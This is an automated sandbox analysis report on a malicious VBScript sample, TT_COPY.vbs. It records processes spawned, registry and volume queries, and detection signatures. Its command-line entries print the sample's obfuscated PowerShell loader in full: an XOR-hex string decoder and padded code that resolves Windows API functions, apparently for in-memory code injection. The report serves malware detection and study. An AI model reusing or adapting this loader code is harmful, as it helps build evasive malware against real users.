'81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 758166 Sample: TT_COPY.vbs Startdate: 01/12/2022 Architecture: WINDOWS Score: 68 17 Potential malicious VBS script found (suspicious strings) 2->17 19 Potential evasive VBS script found (use of timer() function in loop) 2->19 7 wscript.exe 1 1 2->7         started        process3 signatures4 21 VBScript performs obfuscated calls to suspicious functions 7->21 23 Wscript starts Powershell (via cmd or directly) 7->23 25 Obfuscated command line found 7->25 27 Very long command line found 7->27 10 powershell.exe 5 7->10         started        process5 signatures6 29 Very long command line found 10->29 13 conhost.exe 10->13         started        15 powershell.exe 10->15         started        process7
No contacted IP infos